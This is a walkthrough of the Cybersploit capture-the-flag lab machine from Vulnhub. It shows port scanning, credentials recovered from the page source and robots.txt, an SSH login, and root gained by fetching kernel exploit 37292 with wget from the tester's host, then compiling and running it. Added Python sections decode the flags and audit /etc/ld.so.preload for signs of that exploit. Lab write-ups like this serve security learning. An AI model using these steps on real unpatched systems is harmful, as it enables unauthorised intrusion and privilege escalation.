[VLN] Cybersploit

Today we are going to hack the Vulnhub machine called Cybersploit. You can download it from the following link: https://www.vulnhub.com/entry/cybersploit-1,506/
  • Enumeration
  • We start with an nmap scan to see which ports are open.
    ~ > nmap -A -p- 192.168.1.78
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 16:25 CEST
    Nmap scan report for cybersploit-CTF.home (192.168.1.78)
    Host is up (0.00075s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
    |   2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
    |_  256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
    80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
    |_http-server-header: Apache/2.2.22 (Ubuntu)
    |_http-title: Hello Pentester!
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 18.24 seconds
    We visit http://192.168.1.78/ to see if we find anything interesting on the website. If we look at the page source, we can see a comment at the end:
    username:itsskv
    On the other hand, if we visit robots.txt at http://192.168.1.78/robots.txt, we find:
    R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9
    If we base64-decode it we get:
    ~ > echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" | base64 -d
    Good Work !
    Flag1: cybersploit{youtube.com/c/cybersploit}%
    We log in with the credentials: itsskv/cybersploit{youtube.com/c/cybersploit}
  • Low Shell
  • ~ > ssh itsskv@192.168.1.132
    The authenticity of host '192.168.1.132 (192.168.1.132)' can't be established.
    ECDSA key fingerprint is SHA256:19IzxsJJ/ZH00ix+vmS6+HQqDcXtk9k30aT3K643kSs.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.1.132' (ECDSA) to the list of known hosts.
    itsskv@192.168.1.132's password:
    Permission denied, please try again.
    itsskv@192.168.1.132's password:
    Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
     * Documentation:  https://help.ubuntu.com/
    332 packages can be updated.
    273 updates are security updates.
    New release '14.04.6 LTS' available.
    Run 'do-release-upgrade' to upgrade to it.
    Your Hardware Enablement Stack (HWE) is supported until April 2017.
    Last login: Sat Jun 27 10:14:39 2020 from cybersploit.local
    itsskv@cybersploit-CTF:~$
    Let's take a look at itsskv's /home.
    itsskv@cybersploit-CTF:~$ ls -la
    total 156
    drwxr-xr-x 20 itsskv itsskv 4096 Jun 27 10:00 .
    drwxr-xr-x  4 root   root   4096 Jun 25 12:11 ..
    drwxr-xr-x  2 itsskv itsskv 4096 Jun 25 19:04 Desktop
    drwxr-xr-x  2 itsskv itsskv 4096 Jun 25 19:04 Documents
    drwxr-xr-x  2 itsskv itsskv 4096 Jun 25 19:04 Downloads
    -rw-r--r--  1 itsskv itsskv 8445 Jun 25 12:11 examples.desktop
    -rw-rw-r--  1 itsskv itsskv  495 Jun 27 10:03 flag2.txt
    drwxr-xr-x  2 itsskv itsskv 4096 Jun 25 19:04 Music
    drwxr-xr-x  2 itsskv itsskv 4096 Jun 25 19:04 Pictures
    -rw-r--r--  1 itsskv itsskv  675 Jun 25 12:11 .profile
    drwxr-xr-x  2 itsskv itsskv 4096 Jun 25 19:04 Videos
    We can see there is a file called flag2.txt. Let's take a look at it.
    itsskv@cybersploit-CTF:~$ cat flag2.txt
    01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 01110000 01101100 01101111 01101001 01110100 00110001 01111101
    We can see the content is "binary" code. We go to the following website to convert it to ASCII: https://www.rapidtables.com/convert/number/binary-to-ascii.html
    The result is:
    good work ! flag2: cybersploit{https:t.me/cybersploit1}
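As an added example (not part of the original writeup), the Python below decodes both encodings met on this box, the base64 string from robots.txt and the space-separated 8-bit binary in flag2.txt, locally instead of pasting CTF data into a third-party converter. The two constants are the strings shown on this page; `auto_decode` and the strict validation are my own additions, not the author's tooling.

```python
import base64
import binascii
import re
from typing import Tuple

# Flag strings exactly as they appear on this page (robots.txt and flag2.txt).
ROBOTS_B64 = "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9"
FLAG2_BIN = (
    "01100111 01101111 01101111 01100100 00100000 01110111 01101111 01110010 "
    "01101011 00100000 00100001 00001010 01100110 01101100 01100001 01100111 "
    "00110010 00111010 00100000 01100011 01111001 01100010 01100101 01110010 "
    "01110011 01110000 01101100 01101111 01101001 01110100 01111011 01101000 "
    "01110100 01110100 01110000 01110011 00111010 01110100 00101110 01101101 "
    "01100101 00101111 01100011 01111001 01100010 01100101 01110010 01110011 "
    "01110000 01101100 01101111 01101001 01110100 00110001 01111101"
)

BIN_GROUP = re.compile(r"^[01]{8}$")
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def decode_binary_text(data: str) -> str:
    """Whitespace-separated 8-bit groups (the flag2.txt format) -> text."""
    groups = data.split()
    bad = [g for g in groups if not BIN_GROUP.match(g)]
    if bad or not groups:
        raise ValueError(f"not 8-bit binary groups: {bad[:3]}")
    return bytes(int(g, 2) for g in groups).decode("ascii")


def decode_base64_text(data: str) -> str:
    """Strict base64 (the robots.txt format) -> text; rejects junk instead of guessing."""
    token = data.strip()
    if not B64_TOKEN.match(token) or len(token) % 4 == 1:
        raise ValueError("not a base64 token")
    # validate=True turns stray characters into an error instead of silently dropping them
    raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
    return raw.decode("ascii")


def auto_decode(data: str) -> Tuple[str, str]:
    """Try the encodings seen on this box in order; return (encoding, text)."""
    for name, fn in (("binary", decode_binary_text), ("base64", decode_base64_text)):
        try:
            return name, fn(data)
        except (ValueError, binascii.Error, UnicodeDecodeError):
            continue
    raise ValueError("unrecognised encoding")
```

Strict decoding is deliberate: a mistyped byte or a stray character raises instead of producing a plausible-looking wrong flag.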
    We keep looking around the system and see that it has an old kernel.
  • Privilege Escalation
  • itsskv@cybersploit-CTF:~$ uname -a
    Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
    If we search exploit-db, we find the following exploit[1]. We download it to our machine and transfer it to the "victim" machine.
    itsskv@cybersploit-CTF:/tmp$ wget http://192.168.1.111/37292.c
    --2020-07-13 16:17:17--  http://192.168.1.111/37292.c
    Connecting to 192.168.1.111:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 5119 (5.0K) [application/octet-stream]
    Saving to: `37292.c'
    100%[=====================================================>] 5,119       --.-K/s   in 0s
    2020-07-13 16:17:17 (549 MB/s) - `37292.c' saved [5119/5119]
    Once downloaded, we compile it, give it execute permissions and finally run it.
    itsskv@cybersploit-CTF:/tmp$ gcc -o 3 37292.c
    itsskv@cybersploit-CTF:/tmp$ chmod +x 3
    itsskv@cybersploit-CTF:/tmp$ ./3
    spawning threads
    mount #1
    mount #2
    child threads done
    /etc/ld.so.preload created
    creating shared library
    #
    # id
    uid=0(root) gid=0(root) groups=0(root),1001(itsskv)
    We get root :)
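From the defender's side, the exploit output above leaves two loud artefacts: a newly created /etc/ld.so.preload and a freshly built shared library. The following Python audit of a preload file is an added example, not something from the writeup or from the exploit itself; the sample file content, path, uid and mode are constructed, and `stat_of` is a hypothetical lookup callable so the check runs offline.

```python
import stat
from typing import Callable, List, Optional, Tuple

# Trailing slashes so that "/libfoo/x.so" does not pass as living under "/lib".
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # any local user can write here

# Stat lookup: (owner uid, st_mode) for a path, or None if the path does not exist.
StatLookup = Callable[[str], Optional[Tuple[int, int]]]


def audit_preload(content: str, stat_of: StatLookup) -> List[str]:
    """One finding per problem in the given /etc/ld.so.preload text (empty file -> none)."""
    findings: List[str] = []
    for line in content.splitlines():
        path = line.strip()
        if not path or path.startswith("#"):
            continue
        if not path.startswith("/"):
            findings.append(f"{path}: relative path in preload list")
            continue
        if path.startswith(SCRATCH_DIRS):
            findings.append(f"{path}: library lives in a world-writable scratch directory")
        elif not path.startswith(TRUSTED_LIB_DIRS):
            findings.append(f"{path}: library outside the trusted library directories")
        info = stat_of(path)
        if info is None:
            findings.append(f"{path}: listed but missing (stale or cleaned-up loader)")
            continue
        uid, mode = info
        if uid != 0:
            findings.append(f"{path}: not owned by root (uid {uid})")
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"{path}: writable by group/other (mode {oct(mode & 0o777)})")
    return findings


# Constructed sample (made-up path, uid and mode) of a preload file left behind by a
# local root exploit that registered its own shared object.
SAMPLE_PRELOAD = "/tmp/evil-example.so\n"
SAMPLE_FS = {"/tmp/evil-example.so": (1001, 0o100777)}


def sample_findings() -> List[str]:
    return audit_preload(SAMPLE_PRELOAD, lambda p: SAMPLE_FS.get(p))
```

On a live host, feed it the real file text and a lookup built on os.stat (returning None when the path is missing); any finding is a reason to check who created the entry and when.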
  • finalflag.txt
  • # cd /root
    # ls
    finalflag.txt
    # cat finalflag.txt
    [ASCII-art banner, followed by "congratulations" in bubble letters]
    flag3: cybersploit{Z3X21CW42C4 many many congratulations !}
    if you like it share with me https://twitter.com/cybersploit1. Thanks !
  • End
  • And with this we are now root on the machine :)
    [1] https://www.exploit-db.com/exploits/37292